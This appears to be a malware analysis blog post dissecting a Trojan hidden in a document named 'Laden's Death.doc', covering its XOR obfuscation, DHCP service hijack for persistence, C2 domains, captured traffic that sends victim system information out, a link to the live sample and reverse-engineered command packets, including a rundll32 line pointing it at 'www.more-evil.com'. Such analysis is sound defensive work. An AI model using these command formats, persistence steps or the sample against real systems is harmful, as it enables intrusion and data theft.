00000AE3  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
00000AF3  20 20 20 20 20 20 20 20  20 20 20 20 20 20 0a 2d                .-
00000B03  36 33 36 09 77 69 6e 6c  6f 67 6f 6e 2e 65 78 65 636.winl ogon.exe
00000B13  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
00000B23  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
00000B33  2d 36 38 30 09 73 65 72  76 69 63 65 73 2e 65 78 -680.ser vices.ex
00000B43  65 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20 e             NT 
00000B53  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
00000B63  0a 2d 36 39 32 09 6c 73  61 73 73 2e 65 78 65 20 .-692.ls ass.exe 
00000B73  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
00000B83  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
00000B93  4d 0a 2d 38 36 34 09 76  6d 61 63 74 68 6c 70 2e M.-864.v macthlp.
00000BA3  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
00000BB3  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
00000BC3  45 4d 0a 2d 38 39 32 09  73 76 63 68 6f 73 74 2e EM.-892. svchost.
00000BD3  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
00000BE3  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
00000BF3  54 45 4d 0a 2d 39 36 34  09 73 76 63 68 6f 73 74 TEM.-964 .svchost
00000C03  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000C13  20 0a 2d 31 30 37 32 09  73 76 63 68 6f 73 74 2e  .-1072. svchost.
00000C23  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
00000C33  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
00000C43  54 45 4d 0a 2d 31 31 32  38 09 73 76 63 68 6f 73 TEM.-112 8.svchos
00000C53  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
00000C63  20 20 0a 2d 31 32 38 30  09 73 76 63 68 6f 73 74   .-1280 .svchost
00000C73  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000C83  20 0a 2d 31 36 30 34 09  65 78 70 6c 6f 72 65 72  .-1604. explorer
00000C93  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000CA3  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
00000CB3  2d 31 36 38 30 09 56 4d  77 61 72 65 54 72 61 79 -1680.VM wareTray
00000CC3  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 56 49 .exe           VI
00000CD3  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
00000CE3  37 30 38 09 56 4d 77 61  72 65 55 73 65 72 2e 65 708.VMwa reUser.e
00000CF3  78 65 20 20 20 20 20 20  20 20 20 20 56 49 43 54 xe           VICT
00000D03  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 31 37 38 IM\usern ame.-178
00000D13  30 09 73 76 63 68 6f 73  74 2e 65 78 65 20 20 20 0.svchos t.exe   
00000D23  20 20 20 20 20 20 20 20  20 20 0a 2d 31 39 32 38            .-1928
00000D33  09 76 6d 74 6f 6f 6c 73  64 2e 65 78 65 20 20 20 .vmtools d.exe   
00000D43  20 20 20 20 20 20 20 20  20 4e 54 20 41 55 54 48           NT AUTH
00000D53  4f 52 49 54 59 5c 53 59  53 54 45 4d 0a 2d 31 37 ORITY\SY STEM.-17
00000D63  34 34 09 63 6d 64 2e 65  78 65 20 20 20 20 20 20 44.cmd.e xe      
00000D73  20 20 20 20 20 20 20 20  20 20 20 56 49 43 54 49             VICTI
00000D83  4d 5c 75 73 65 72 6e 61  6d 65 0a 2d 31 31 37 36 M\userna me.-1176
00000D93  09 57 69 6e 48 65 78 2e  65 78 65 20 20 20 20 20 .WinHex. exe     
00000DA3  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
00000DB3  75 73 65 72 6e 61 6d 65  0a 2d 33 39 32 09 69 64 username .-392.id
00000DC3  61 67 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 ag.exe           
00000DD3  20 20 20 20 20 20 56 49  43 54 49 4d 5c 75 73 65       VI CTIM\use
00000DE3  72 6e 61 6d 65 0a 2d 31  36 34 38 09 73 74 75 6e rname.-1 648.stun
00000DF3  6e 65 6c 2e 65 78 65 20  20 20 20 20 20 20 20 20 nel.exe          
00000E03  20 20 20 20 56 49 43 54  49 4d 5c 75 73 65 72 6e     VICT IM\usern
00000E13  61 6d 65 0a 2d 31 32 34  34 09 49 6d 6d 75 6e 69 ame.-124 4.Immuni
00000E23  74 79 44 65 62 75 67 67  65 72 2e 65 78 65 20 20 tyDebugg er.exe  
00000E33  20 20 56 49 43 54 49 4d  5c 75 73 65 72 6e 61 6d   VICTIM \usernam
00000E43  65 0a 2d 31 33 33 32 09  73 68 73 74 61 74 2e 65 e.-1332. shstat.e
00000E53  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
00000E63  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
00000E73  00                                               .

• Today looking at file:

File Name:  Laden's Death.doc
File Size:  163065 bytes
MD5:        dad4f2a0f79db83f8976809a88d260c5
SHA1:       d563029a2dfe3cfcddc7326b1b486213095e58e5

• This file was mentioned at http://contagiodump.blogspot.com/ and downloaded here: http://www.mediafire.com/?1qqabtgtbi419b9.

CARRIER FILE ANALYSIS –> quick look

• The obfuscation used in this file is not complex and is easily discernible.
• The payload starts at file-offset 0x1AF9 and is obfuscated with a one byte XOR key 0xFC, skipping NULL bytes and bytes that match the key.
• The extracted payload has the following characteristics:

File Name:  payload.exe
File Size:  73728 bytes
MD5:        60f9705746941e6a7b19468ffd2c02fb
SHA1:       d4c2f8e4da6d3085e1ecacb46053df7b28a37fb7
PE Time:    0x4DA5658C [Wed Apr 13 08:57:48 2011 UTC]
AV:         13/42 (31.0 %) [VirusTotal]
 Sections (5):
 Name      Entropy  MD5
 .text     5.02     0a3e48ce756511bd17a57a35b36c315a
 .rdata    2.88     5aaba9f0590d9d61026187197ed7d539
 .data     1.99     efe906def7f4fe4f939a56fd6e45fd6c
 .rsrc     1.29     6ef6f184eaa0b44304eb0685c2d95d95
 .idata    6.92     2583a7a9e62583bfcc9ccdaeb5be64a5

PAYLOAD.EXE ANALYSIS

- Filesystem artifacts

• When the payload is executed it first tries to WinExec: notepda.dat (not misspelled) however this file does not exist.
• Creates C:\WINDOWS\system32\hongzquit.dat. This is a 0 byte file, which is then deleted.
  
• An obfuscated DLL within the payload is decrypted and written to a file in the user’s temp folder: vmm#.tmp.
• The timestamps of this temp file are backdated to match those of notepad.exe.
• File vmm#.tmp is moved to c:\windows\system32\dhcpsrv.dll
• File dhcpsrv.dll has the following characteristics:

File Name:  dhcpsrv.dll
File Size:  44504 bytes
MD5:        06ddf39bc4b5c7a8950f1e8d11c44446
SHA1:       b8c11c68f3e92b60cc4b208bd5905c0365f28978
PE Time:    0x4D9C2616 [Wed Apr 06 08:36:38 2011 UTC]
AV:         6/42 (14.3 %) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.14     5c8b018d10792fdb74b5f289f97c5d06
 .rdata    4.73     88003ece00266ee44c21ac6242a7eafd
 .data     4.99     1d745a13a1f55e75b2f68adee97c6f59
 .reloc    5.7      e437cc92e10504181d7b712478db6af3

• The dropped DLL is loaded using the following command:

rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",CRestart 0x11"

• In addition to the CRestart function, this DLL also exports functions: CRestartA and ServiceMain
• Payload.exe decrypts the configuration information of the DLL by XOR-ing with 0xFE starting at file-offset 0xAC00.
• The configuration information specifies the name of the malicious DLL (in this case dhcpsrv.dll), and which service will be hijacked (in this case the DHCP service).
• Here is the decrypted configuration data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0000AC00   70 69 63 74 75 72 65 2E  75 63 70 61 72 6C 6E 65   picture.ucparlne
0000AC10   74 2E 63 6F 6D 00 00 00  00 00 00 00 00 00 00 00   t.com          
0000AC20   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC30   00 00 00 00 00 00 00 00  00 00 00 00 73 73 69 2E               ssi.
0000AC40   75 63 70 61 72 6C 6E 65  74 2E 63 6F 6D 00 00 00   ucparlnet.com  
0000AC50   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC60   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC70   00 00 00 00 00 00 00 00  00 63 75 6D 65 6E 74 73            cuments
0000AC80   20 61 6E 64 20 53 65 74  74 69 6E 67 73 5C 72 6F    and Settings\ro
0000AC90   67 65 72 5C D7 C0 C3 E6  5C B9 A4 BE DF 5C BA EC   ger\×ÀÃæ\¹¤¾ß\ºì
0000ACA0   D6 D0 5B 32 30 31 31 30  34 32 33 5D 5C BA EC D6   ÖÐ[20110423]\ºìÖ
0000ACB0   D0 5B 32 30 00 00 00 00  32 33 5D 5C 53 65 72 76   Ð[20    23]\Serv
0000ACC0   65 72 5C 54 72 6F 79 43  00 6E 66 69 67 00 48 4C   er\TroyC nfig HL
0000ACD0   50 00 14 00 9C 13 DF 5A  0C 00 00 00 BB 01 50 00   P   œ ßZ    » P
0000ACE0   50 00 64 68 63 70 00 00  00 00 00 00 00 00 00 00   P dhcp         
0000ACF0   00 00 00 00 00 00 64 68  63 70 73 72 76 2E 64 6C         dhcpsrv.dl
0000AD00   6C 00 00 00 00 00 00 00  00 00 00 AC 00 00 68 74   l          ¬  ht
0000AD10   74 70 3A 2F 2F 63 68 65  63 6B 65 72 72 6F 72 2E   tp://checkerror.
0000AD20   75 63 70 61 72 6C 6E 65  74 2E 63 6F 6D 2F 6E 65   ucparlnet.com/ne
0000AD30   77 73 2E 6A 70 67 00 00  00 00 00 00 00 00 00 00   ws.jpg         
0000AD40   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AD50   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AD60   00 00 00 00 00 00 00 00  00 00 00 00 00 85 75 73                …us
0000AD70   62 65 78 74 65 72 6E 2E  65 78 65 3A 30 2C 6B 62   bextern.exe:0,kb
0000AD80   65 78 74 65 72 6E 2E 65  78 65 3A 30 2C 6D 61 69   extern.exe:0,mai
0000AD90   6C 70 76 2E 62 61 74 3A  31 2C 4E 65 77 54 72 6F   lpv.bat:1,NewTro
0000ADA0   6A 61 6E 2E 64 6C 6C 3A  30 2C 00 00 00 00 00 00   jan.dll:0,     
0000ADB0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000ADC0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00                  
0000ADD0   0B 4B D0 CF 11 E0 24 30                             KÐÏ à$0

• The last two bytes of the data above (0×2430) are a checksum to verify the integrity of the configuration data.
• If the data contained in the profile path is Chinese, it may look like this:

袤醱\馱撿\綻笢[20110423]\綻笢[20

• Google Translate gives me this somewhat funny translation:

Vast fermentation \ pack pick \ Zhan Min [20110423] \ Zhan Min [20

• If you understand Chinese maybe you can shed some light on this.

• These other service names are present on this DLL, which may imply that this is a list of potential target services that the attacker can pick from when creating this Trojan.

Service Name       Original (non-malicious) file name
wuauserv           C:\WINDOWS\system32\wuauserv.dll
dhcp               C:\WINDOWS\system32\dhcpcsvc.dll
dmserver           C:\WINDOWS\system32\dmserver.dll
lanmanworkstation  C:\WINDOWS\system32\wkssvc.dll
EventSystem        C:\WINDOWS\system32\es.dll
Netman             C:\WINDOWS\system32\Netman.dll

• So, payload.exe entrenches the DLL in the registry by hijacking the DHCP service by replacing the existing file (dhcpsvc.dll) with the malicious one (dhcpsrv.dll) in the registry under ServiceDLL.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
ServiceDLL = C:\WINDOWS\system32\dhcpsrv.dll

• The dropper is then deleted.
• Here are some other files you may find on the system infected with this Trojan:

C:\DOCUME~1\username\LOCALS~1\Temp\~Thumbbs.tmp
  (not misspelled, also HIDDEN and SYSTEM attributes set)
The Trojan looks for files: usbextern.exe, kbextern.exe, mailpv.bat and NewTrojan.dll
  (in the C:\WINDOWS\system32\ folder or wherever dhcpsrv.dll is located).

C:\DOCUME~1\username\LOCALS~1\Temp\pre#.tmp
  (this file would contain file data of news.jpg from http://checkerror.ucparlnet.com/news.jpg

NETWORK ARTIFACTS – dhcpsrv.dll

• The Trojan tries to resolve the following domains:

checkerror.ucparlnet.com  - 203.67.127.165 over TCP port 80
ssi.ucparlnet.com         - 58.34.152.233 over TCP port 80
www.dnswatch.info         - not malicious, however relevant in this context
picture.ucparlnet.com     - 203.67.127.165 over TCP port 443 (NOT SSL)

• The Trojan also makes direct DNS queries to the following two IP addresses: 139.175.55.244 and  168.95.1.1

244.55.175.139.in-addr.arpa.    PTR    86400    dns.seed.net.tw.
1.1.95.168.in-addr.arpa.        PTR    86400    dns.hinet.net.

• The Trojan first tries to resolve its hostnames indirectly by sending the following type of request to www.dnswatch.info over TCP port 80:

GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache

• The Trojan parses the reply from www.dnswatch.info for the phrase: “A record found:” and then connects to the IP address following it.  So, www.dnswatch.com is being used as a DNS proxy.
• Therefore, domain www.dnswatch.info is not malicious, however it is relevant in the context of this Trojan, in that you may never see hostnames:  picture.ucparlnet.com and ssi.ucparlnet.com in your DNS logs.
• The Trojan sends this type of request to checkerror.ucparlnet.com (this DNS query is done normally):

GET /news.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive

• It sent the following types of request to ssi.ucparlnet.com over TCP port 80 and picture.ucparlnet.com over TCP port 443 (NOT SSL):

POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache

00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00 00 00 00 00 00 00 00  00 00 00 00 07 00 00 00   ........ ........
f1 ee e4 f3 ee ea a7                               .......

ENCRYPTION KEY

• The 8th DWORD (bytes 29 – 32) is an integer that specifies the length of the data that follows (in this case 7 bytes)
  
• The last seven bytes (0xF1EEE4F3EEEAA7) represent the machine name XOR-ed with 0xA7.  In fact, the last byte is NULL, so an easy way to determine the XOR key if a different value is used in other iterations of this Trojan, is to look at this last byte and use that as the XOR key.
• The Trojan expects at least 32 bytes on its first reply.  The eighth DWORD again is an integer that specifies the length of the data that follows.

TROJAN FUNCTIONALITY

• This Trojan offers the following functionality (the hex values are explained below):
  • 0xA1B1 > Directory listing
  • 0xA1B3 > Delete a file
  • 0xA1B4 > Upload a file (from C2 node to victim)
  • 0xA1B5 > Download a file (from victim to C2 node)
  • 0xA1B7 > Execute a file
  • 0xA1C1 > Report system’s local time.
  • 0xBBB1 > List basic system Information
  • 0xBBB2 > Can be instructed to run only during certain times.
  • 0xBBB3 > Uninstall
  • 0xBBB4 > Communicate with another specified hostname (this does not really work – read below)

• I received a PCAP from this Trojan, which does not have any meaningful communication with the Trojan other than the following behavior:
  • When this Trojan first connects to the C2 node, it appears the C2 node assigns the victim a number in the form of: “new_host_#” (XOR-ed with 0xA7 below: 0xc9c2d0f8cfc8d4d3f893a7), and the victim (i.e. the Trojan) uses it in the header of all subsequent transmissions in plain text (new_host_4).
  • This is probably a way for the C2 node to keep track of unique hosts with which it is communicating.
• After this initial exchange, the Trojan transmits some basic system information (machine name, OS version, username, IP address, and drive letters) to the C2 node.

00000000  50 4f 53 54 20 68 74 74  70 3a 2f 2f 70 69 63 74 POST htt p://pict
00000010  75 72 65 2e 75 63 70 61  72 6c 6e 65 74 2e 63 6f ure.ucpa rlnet.co
00000020  6d 3a 34 34 33 2f 50 48  71 67 48 75 6d 65 61 79 m:443/PH qgHumeay
00000030  35 37 30 35 2e 6d 70 33  20 48 54 54 50 2f 31 2e 5705.mp3  HTTP/1.
00000040  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d 1..User- Agent: M
00000050  6f 7a 69 6c 6c 61 2f 34  2e 38 2e 32 30 20 28 63 ozilla/4 .8.20 (c
00000060  6f 6d 70 61 74 69 62 6c  65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
00000070  35 2e 30 2e 32 3b 20 57  69 6e 33 32 29 0d 0a 48 5.0.2; W in32)..H
00000080  6f 73 74 3a 20 70 69 63  74 75 72 65 2e 75 63 70 ost: pic ture.ucp
00000090  61 72 6c 6e 65 74 2e 63  6f 6d 20 0d 0a 43 6f 6e arlnet.c om ..Con
000000A0  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 34 38 0d tent-Len gth: 48.
000000B0  0a 50 72 6f 78 79 2d 43  6f 6e 6e 65 63 74 69 6f .Proxy-C onnectio
000000C0  6e 3a 20 6b 65 65 70 2d  61 6c 69 76 65 0d 0a 50 n: keep- alive..P
000000D0  72 61 67 6d 61 3a 20 6e  6f 2d 63 61 63 68 65 0d ragma: n o-cache.
000000E0  0a 0d 0a 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 10 ........ ........
00000100  00 00 00 e2 f1 e6 e9 8a  e3 e3 e5 eb f1 91 e5 f6 ........ ........
00000110  ff e9 a7                                         ...
 00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
 00000010  0a 44 61 74 65 3a 20 57  65 64 20 4d 61 79 20 30 .Date: W ed May 0
 00000020  34 20 30 35 3a 35 34 3a  35 37 20 32 30 31 31 0d 4 05:54: 57 2011.
 00000030  0a 53 65 72 76 65 72 3a  20 41 70 61 63 68 65 2f .Server:  Apache/
 00000040  31 2e 33 2e 32 30 20 28  55 6e 69 78 29 20 20 28 1.3.20 ( Unix)  (
 00000050  52 65 64 2d 48 61 74 2f  4c 69 6e 75 78 29 0d 0a Red-Hat/ Linux)..
 00000060  43 6f 6e 74 65 6e 74 2d  4c 65 6e 67 74 68 3a 20 Content- Length: 
 00000070  34 33 0d 0a 43 6f 6e 74  65 6e 74 2d 54 79 70 65 43..Cont ent-Type
 00000080  3a 20 61 70 70 6c 69 63  61 74 69 6f 6e 2f 6f 63 : applic ation/oc
 00000090  74 65 74 2d 73 74 72 65  61 6d 0d 0a 50 72 6f 78 tet-stre am..Prox
 000000A0  79 2d 43 6f 6e 6e 65 63  74 69 6f 6e 3a 20 6b 65 y-Connec tion: ke
 000000B0  65 70 2d 61 6c 69 76 65  0d 0a 0d 0a 00 00 00 00 ep-alive ........
 000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000000D0  00 00 00 00 00 00 00 00  0b 00 00 00 c9 c2 d0 f8 ........ ........
 000000E0  cf c8 d4 d3 f8 93 a7                             .......
00000113  50 4f 53 54 20 68 74 74  70 3a 2f 2f 70 69 63 74 POST htt p://pict
00000123  75 72 65 2e 75 63 70 61  72 6c 6e 65 74 2e 63 6f ure.ucpa rlnet.co
00000133  6d 3a 34 34 33 2f 4c 46  44 58 46 69 52 63 56 73 m:443/LF DXFiRcVs
00000143  33 39 30 32 2e 72 61 72  20 48 54 54 50 2f 31 2e 3902.rar  HTTP/1.
00000153  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d 1..User- Agent: M
00000163  6f 7a 69 6c 6c 61 2f 34  2e 32 2e 32 30 20 28 63 ozilla/4 .2.20 (c
00000173  6f 6d 70 61 74 69 62 6c  65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
00000183  35 2e 30 2e 32 3b 20 57  69 6e 33 32 29 0d 0a 48 5.0.2; W in32)..H
00000193  6f 73 74 3a 20 70 69 63  74 75 72 65 2e 75 63 70 ost: pic ture.ucp
000001A3  61 72 6c 6e 65 74 2e 63  6f 6d 20 0d 0a 43 6f 6e arlnet.c om ..Con
000001B3  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 36 38 32 tent-Len gth: 682
000001C3  0d 0a 50 72 6f 78 79 2d  43 6f 6e 6e 65 63 74 69 ..Proxy- Connecti
000001D3  6f 6e 3a 20 6b 65 65 70  2d 61 6c 69 76 65 0d 0a on: keep -alive..
000001E3  50 72 61 67 6d 61 3a 20  6e 6f 2d 63 61 63 68 65 Pragma:  no-cache
000001F3  0d 0a 0d 0a                                      ....
000001F7  02 6e 65 77 5f 68 6f 73  74 5f 34 00 00 00 00 00 .new_hos t_4.....
00000207  00 00 00 00 00 00 00 00  00 00 00 00 8a 02 00 00 ........ ........
00000217  1c 16 1c 58 a7 a7 a7 a7  a7 a7 a7 a7 a7 a7 a7 a7 ...X.... ........

• Another behavior of this Trojan is that it expects the commands to be transmitted separately from the HTTP header, otherwise data is misaligned and nothing works.
• The commands from the C2 node will have an HTTP header, followed by binary data.
• The first 32 bytes of the binary data serve as a header, which has the following structure:
  • Byte 0:               Can be 0, 1, or 2.  Needs to be 2 for a command to be processed.
  • Bytes 29 – 32:   An integer specifying the length of the data that follows the 32 byte header.
• The data following the 32 byte header has the following structure (on the wire every byte mentioned below would be XOR-ed with 0xA7)
  • It must be at least 0×148 bytes (328 bytes) long.
  • Byte 0:  Must be 0xA1 or 0xBB.
    • When 0xA1:
      • Byte 1:  Can be 0xB1 through 0xC1.  These are a group of commands the Trojan executes.
    • When 0xBB:
      • Byte 1:  Can be 0xB1 through 0xB4.  These are a second group of commands the Trojan executes.
• Now I will give some examples of commands that worked for me.  Please note that I do not have any actual PCAPs that contains these commands, so some of the filler data (NULLS) maybe different.
• The command that instructs the Trojan to perform a directory listing is shown below (again, on the wire the data following the 32 byte header would be XOR-ed with 0xA7):

 00000098  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
 000000A8  0a 43 6f 6e 74 65 6e 74  2d 4c 65 6e 67 74 68 3a .Content -Length:
 000000B8  20 33 36 38 0d 0a 43 6f  6e 74 65 6e 74 2d 54 79  368..Co ntent-Ty
 000000C8  70 65 3a 20 61 70 70 6c  69 63 61 74 69 6f 6e 2f pe: appl ication/
 000000D8  6f 63 74 65 74 2d 73 74  72 65 61 6d 0d 0a 50 72 octet-st ream..Pr
 000000E8  6f 78 79 2d 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 oxy-Conn ection:
 000000F8  6b 65 65 70 2d 61 6c 69  76 65 0d 0a 0d 0a       keep-ali ve....
 00000106  02 6e 65 77 5f 68 6f 73  74 5f 34 00 00 00 00 00 .new_hos t_4.....
 00000116  00 00 00 00 00 00 00 00  00 00 00 00 50 01 00 00 ........ ....P...
 00000126  a1 b1 00 63 00 3a 00 5c  00 00 00 00 00 00 00 00 ...c.:.\ ........
 00000136  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000146  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000156  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000166  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000176  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000186  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000196  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001A6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001B6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001C6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001D6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001E6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 000001F6  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000206  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000216  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000226  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000236  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000246  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000256  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
 00000266  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........

• Here is the command to execute notepad.exe.  Notice that at offset 0×107 of the data following the 32 byte header we need to have 0xAA000000 and offset 0x13F must be 0×00000000:

00000000   02 6E 65 77 5F 68 6F 73  74 5F 34 00 00 00 00 00    new_host_4    
00000010   00 00 00 00 00 00 00 00  00 00 00 00 50 01 00 00               P  
00000020   A1 B7 00 6E 00 6F 00 74  00 65 00 70 00 61 00 64   ¡· n o t e p a d
00000030   00 2E 00 65 00 78 00 65  00 00 00 00 00 00 00 00    . e x e       
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000120   00 00 00 00 00 00 00 AA  00 00 00 00 00 00 00 00          ª       
00000130   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000140   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000150   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000160   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

• Hopefully these two examples clarify the format of the rest of the commands.

• One additional observation I made during my analysis is that file ~Thumbbs.tmp serves as a log file that records when a command was executed and if there were any errors.  The data of this file is XOR-ed with 0xAB.  Here is a sample output (decrypted) after a command is successfully executed:

2011-05-05 19:48:31    FileCmd __xxx__ >=Win2k

• Finally, I mentioned above that command 0xBBB4 does not really work.  When this command is called a C2 node domain name or IP address would be passed as an argument.  The Trojan then executes the following command on the system:

rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",TStartUp 0x22 www.more-evil.com

• This command fails because there is no exported function named TStartUp.  This may have been an older name that the author forgot to update on this iteration of the Trojan.
• This command works perfectly well if we make this call with the correct function name:

rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",CRestart 0x22 www.more-evil.com